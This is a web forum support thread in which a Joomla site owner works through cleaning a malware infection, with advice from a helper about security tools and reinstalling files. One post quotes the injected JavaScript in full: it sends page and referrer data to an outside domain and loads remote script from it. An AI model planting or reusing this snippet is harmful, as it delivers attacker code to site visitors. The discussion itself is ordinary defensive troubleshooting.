SOLVED MW:JS:GEN2?web.js.malware.fake_jquery.001
-
-
- Riccardo
- Elite Rocketeer
- Posts: 1078
- Thanks: 28
-
I find this errors:
By access to joomla admin:Notice: Undefined index: n836ecb2 in /var/www/vhosts/domainname.com/httpdocs/domainname.info/libraries/legacy/controller/legacy.php on line 1
By visit the website (public site):Notice: Undefined index: n836ecb2 in /var/www/vhosts/domainname.com/httpdocs/domainname.info/libraries/legacy/controller/legacy.php on line 1
I have scan the website with BitDefender but nothing finded, but sucuri.net gives me the infection.
Has someone already this situation solved and can tell me which infected components are to be overwritten?
I have instructed my system analyst and hoster, to make a cleaning malware on system side but I would ask if you have other experiences in order to accelerate the procedure... - Last Edit: 8 years 10 months ago by MrT.
- Riccardo Rausch
www.rausch.it
-
-
-
- MrT
- Preeminent Rocketeer
- Posts: 101084
- Thanks: 13482
- Web Designer/Developer
-
You have been hacked. As I have told you previously bitdefender will not protect you against being hacked.
You will have to manually delete all the spoof files - they typically have "01" "02" etc in their file names. We have seen this hack nuerous times - it comes about from the recent Joomla security weaknesses that were correct between 3.4.6 and 3.4.8. Using a good security product would also have prevented this (e.g. Akeeba Admin Tools Pro or RSFirewall).
Regards, Mark. - Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
-
-
-
- Riccardo
- Elite Rocketeer
- Posts: 1078
- Thanks: 28
-
I found the malicious code in the index.php file of all three templates (rt_cerulean, beez3 and protostar), and had delete and copy the folders "\libraries\legacy" and "\ libraries\rokcommon" (the complete folder with all the files and subdirectories).
Then I reinstalled the template cerluean 1.6 and the gantry framework.
Now the two errors are gone.
I scanned the site with quttera.com, who has not found any more infections. Sucuri.net continues's report the malware, but I read on the web, that there are many doubts about its reliability.
As recommended, I immediately installed Akeeba Admin Tools Professional 3.6.8, but it seems that there is still something wrong because the site has become very slow.
Could someone tell me if it also depends still from the site (gantry?), or I was wrong to set the Akeeba component?
This the malicious code founded:<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://americanexceptionalism.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script> - Last Edit: 8 years 10 months ago by Riccardo.
- Riccardo Rausch
www.rausch.it
-
-
-
- MrT
- Preeminent Rocketeer
- Posts: 101084
- Thanks: 13482
- Web Designer/Developer
-
The malicious code just get randomly put in places to hide it... I've seen it in all sorts of different places on member sites. There is no significance to where the malicious code resides.
I don't understand your question really (Gantry vs Akeeba)? I use Akeeba Admin Tools Pro on many sites and it does not slow them down for me. But if you think it has in your case then Akeeba are the people to ask.
Gantry 5 is required for the template you are using. Akeeba Admin Tools is a security product that is installed in Joomla. neither have any dependency on each other.
Don't forget also that you have to configure Akeeba Admin Tools Pro in WAF and htacces maker - it doesn't just "work" withou you configuring it properly.
Regards, Mark. - Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
-
-
-
- Riccardo
- Elite Rocketeer
- Posts: 1078
- Thanks: 28
-
It was probably my misspoke. I mentioned Gantry as a possible responsible for the slowdown, because this bug happened after his re-installation. It was a simple question, given that such a defect, I never happened on a single website.
I set Akeeba as recommended by the manufacturer; I followed especially presets recommended - especially about the firewall and IP blocking aggressive.
Before opening a ticket with akeeba, I wanted to get an idea on the basis of your experience. - Last Edit: 8 years 10 months ago by Riccardo.
- Riccardo Rausch
www.rausch.it
-
-
-
- MrT
- Preeminent Rocketeer
- Posts: 101084
- Thanks: 13482
- Web Designer/Developer
-
Why would Gantry slow things down? If you use a Gantry 5 template then you need Gantry?
I use both Gantry5 and Akeeba admin tools Pro (AATP) on many sites and have no issues.
If you open a ticket on Akeeba they're going to want to see specific timing examples. (AATP on and AATP off) so make sure you supply that to them. I can't believe the difference is anything significant.
Regards, Mark. - Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
-
-
-
- Riccardo
- Elite Rocketeer
- Posts: 1078
- Thanks: 28
-
Cerulean is of 2012 and use (by design) gantry 4.1.29 (see download section). I haven't upgraded this website to the gantry5, why this is a hobby site that is active only as memory archive.
While I write this post, I noticed a link that start by click on the menu items and pointing to a russian website. I fear that there is still malicious code... - Riccardo Rausch
www.rausch.it
-
-
-
- MrT
- Preeminent Rocketeer
- Posts: 101084
- Thanks: 13482
- Web Designer/Developer
-
Ah ok as you posted in Configuration and Security I did not know what template you were using and just assumed it was G5 (my bad), Yes Cerulean is G4. Yes, it sounds like you still have malicious code on your site and that will definitely slow things down. AATP can remedy an already hacked site it can only protect you against further hacks.
Regards, Mark. - Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
-
-
-
- Riccardo
- Elite Rocketeer
- Posts: 1078
- Thanks: 28
-
As they say, desperate times - desperate measures! I downloaded the version from joomla (those from the website), unzipped locally, eliminated the configuration files and did a nice ftp overwriting all the 4900 files of Joomla.
Now I'm taking a break and tomorrow I will see if this plugin (that generates this malicious code) is still present. - Last Edit: 8 years 10 months ago by Riccardo.
- Riccardo Rausch
www.rausch.it
-
-
-
- MrT
- Preeminent Rocketeer
- Posts: 101084
- Thanks: 13482
- Web Designer/Developer
-
Ok, again please let us know the outcome.
Regards, Mark. - Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information.
-
Time to create page: 0.057 seconds